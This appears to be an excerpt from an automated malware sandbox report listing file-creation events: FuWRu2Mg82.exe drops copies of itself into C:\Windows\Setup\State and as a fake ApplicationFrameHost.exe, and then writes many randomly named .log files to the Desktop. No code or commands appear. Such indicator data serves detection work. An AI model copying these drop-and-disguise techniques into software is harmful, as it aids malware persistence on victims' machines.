Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\cvPvVBnu.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\yjZbtAhM.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\urIzQXcN.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\zDtRwDyC.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\oGldkuRF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\rkEsDtOz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\FfPYKNJo.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\iOIEHOMQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\UfIwHmIl.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Windows\Setup\State\axnJvpyQnMRKSw.exe	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\laJtiVqg.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\cYNuQcag.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\FXwZeocX.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\fuqEGhOs.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\EbCAWgmB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\OwBiJsIk.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\oDsvbdmi.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\bdHDOXcB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\BUFrAOsF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\hXRMEvFO.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\WXBCJNum.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\mBGMFuin.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\EoSiPjjU.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\lznUObWJ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\rOokxXeT.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\SyoPiFGW.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\qJBbnKCZ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\XHQMeNzh.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\ppoidSFB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\GLAhPCYV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\KPopdtuG.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\wnSKynRr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\zjtRYRad.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\hfHcbqAm.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\PqqGNnMb.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\iIdmhsXq.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\uzrRvGCS.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\dObMrONS.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\WdCFCCCo.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\lbqdvNOF.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\ZQQluKfk.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\sqwCQUcY.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\giAKkGeJ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\bEzNzlOz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\JOnPlldQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\qQNccXPY.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\jEubeWaS.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\eLulMUIY.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\IuCyCayI.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\NJvfkcmc.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\pUZBMbtU.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\NWmyzMoB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\slzTDrMW.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\DZeKnCHE.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\yaIZBZii.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\oUFLhKAD.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\GTNiEPlU.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\LQfwyfBd.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\bNbWVinF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\dkrUwkwy.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\saTzkgPu.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\sWxBtiEz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\IimQJXBp.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\VmFPHYcT.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\tuDcNqgt.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\lkPRlAvL.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\RQVXPZTR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\vqKsIEwO.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\utjkmEhT.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\TpEwEWgR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\QkZgZWxz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\vodJuMXp.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\INvIQzWs.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ZUMnkmBH.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\JPUzzdBp.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\PpJWzvoC.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\SwMdNZCQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\drJTdJeQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\XkYexKxm.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ecVtFGvr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\GhhRBgVS.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\SKDxcIEq.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\QynQebMf.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\spVQuoXR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\xchRfZTn.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\uNikKqFs.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\eMbVZMhw.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\EvoHLreS.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\KGLrCwIr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\OKWQGJri.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\tLQsTXtO.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\mGJtKjSH.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\BXrbSTCJ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\gAtVyfCt.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\JiGGnouG.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\pQzkpSqZ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\DHkzZdjU.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\zGAgyZQh.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\DVKqIFYb.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\adtLbSCC.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\sfUBdVXw.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\xDZbRmFl.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\jZEuaeKK.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\cGGcCHge.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\RDLnOhqQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\CpJqgrwA.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\SmsYQpId.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\DzuiDjow.log	Jump to dropped file

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Windows\Setup\State\axnJvpyQnMRKSw.exe			Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Windows\Web\ApplicationFrameHost.exe			Jump to dropped file

Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\wQKprcQn.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\fJtKXqkZ.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\MwRFEUPK.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\DOypUrKc.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\saTzkgPu.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\cYNuQcag.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\JGbOwXPR.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\zXHyMvKj.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\ppoidSFB.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\hLfttZpU.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\fiPsZiXa.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\lkPRlAvL.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\cGGcCHge.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\TYnMSebw.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\CQWhyrvh.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\zGAgyZQh.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\jEubeWaS.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\ZQQluKfk.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\PhxVLhaD.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\FzdFbFVV.log	Jump to dropped file
Source: C:\Users\user\Desktop\FuWRu2Mg82.exe	File created: C:\Users\user\Desktop\WXBCJNum.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\aTWLrgjG.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\CdAHeASz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\uzrRvGCS.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\spVQuoXR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\adtLbSCC.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\RzlVrZnV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\HQSFHwhn.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\qJBbnKCZ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\gVWkEyHr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\NJvfkcmc.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\urIzQXcN.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\dkrUwkwy.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\SwMdNZCQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\BpwztmWB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ZuAdpowF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\HiZYWSbq.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\pVxSCwGb.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ehScSkLt.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\UyzMiIGL.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\LQfwyfBd.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\uIPRftWP.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\IUYfDSlJ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\IlfySofL.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\oOhryAfv.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\XHQMeNzh.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\EvoHLreS.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\miMCrVKD.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\cuiLHKPV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\JiGGnouG.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\sbpbUBOr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\giAKkGeJ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\HxbpgajN.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\pkzkNEOy.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\drJTdJeQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\DHkzZdjU.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\luItGIOF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\IuCyCayI.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\WQnMOzSe.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\waDRLkih.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\dObMrONS.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\UfIwHmIl.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\BNVQohxV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\hfHcbqAm.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\bdHDOXcB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\nONBTjme.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\dfuljGgw.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\VClwANRP.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\LTSgQlLh.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\CpJqgrwA.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\tGqbwPqT.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\iSLkMDwk.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\YksUcbqD.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\IimQJXBp.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\zzTAZvvH.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\pQzkpSqZ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ecVtFGvr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\MQtollac.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ChaYBIVv.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\laJtiVqg.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\bmeDyKvy.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\RDLnOhqQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\BBFiueAC.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\zrjhuLVB.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\fzytxiEW.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\rkEsDtOz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\iGwCTAyR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\adnNjHjk.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\PpJWzvoC.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\GLAhPCYV.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\xchRfZTn.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\nuOBvxNF.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\eLulMUIY.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\UcbVcsDq.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\DVKqIFYb.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\SwGfVNiy.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\JOnPlldQ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\yaIZBZii.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\orpJRxcA.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\XkYexKxm.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\FXwZeocX.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\vodJuMXp.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\mGJtKjSH.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\dcBDaqCa.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\SoXNqeHs.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\qQNccXPY.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\rOokxXeT.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\ifVUOvZl.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\RYEpuIuX.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\HplZKgpp.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\FfPYKNJo.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\pdJUqKUa.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\fuqEGhOs.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\UGLNXWUK.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\DzuiDjow.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\tLQsTXtO.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\bEzNzlOz.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\RQVXPZTR.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\zDtRwDyC.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\pUZBMbtU.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\YNJWsoOG.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\GBhRZStr.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\wSNBpqnJ.log	Jump to dropped file
Source: C:\Recovery\axnJvpyQnMRKSw.exe	File created: C:\Users\user\Desktop\lejLFetb.log	Jump to dropped file
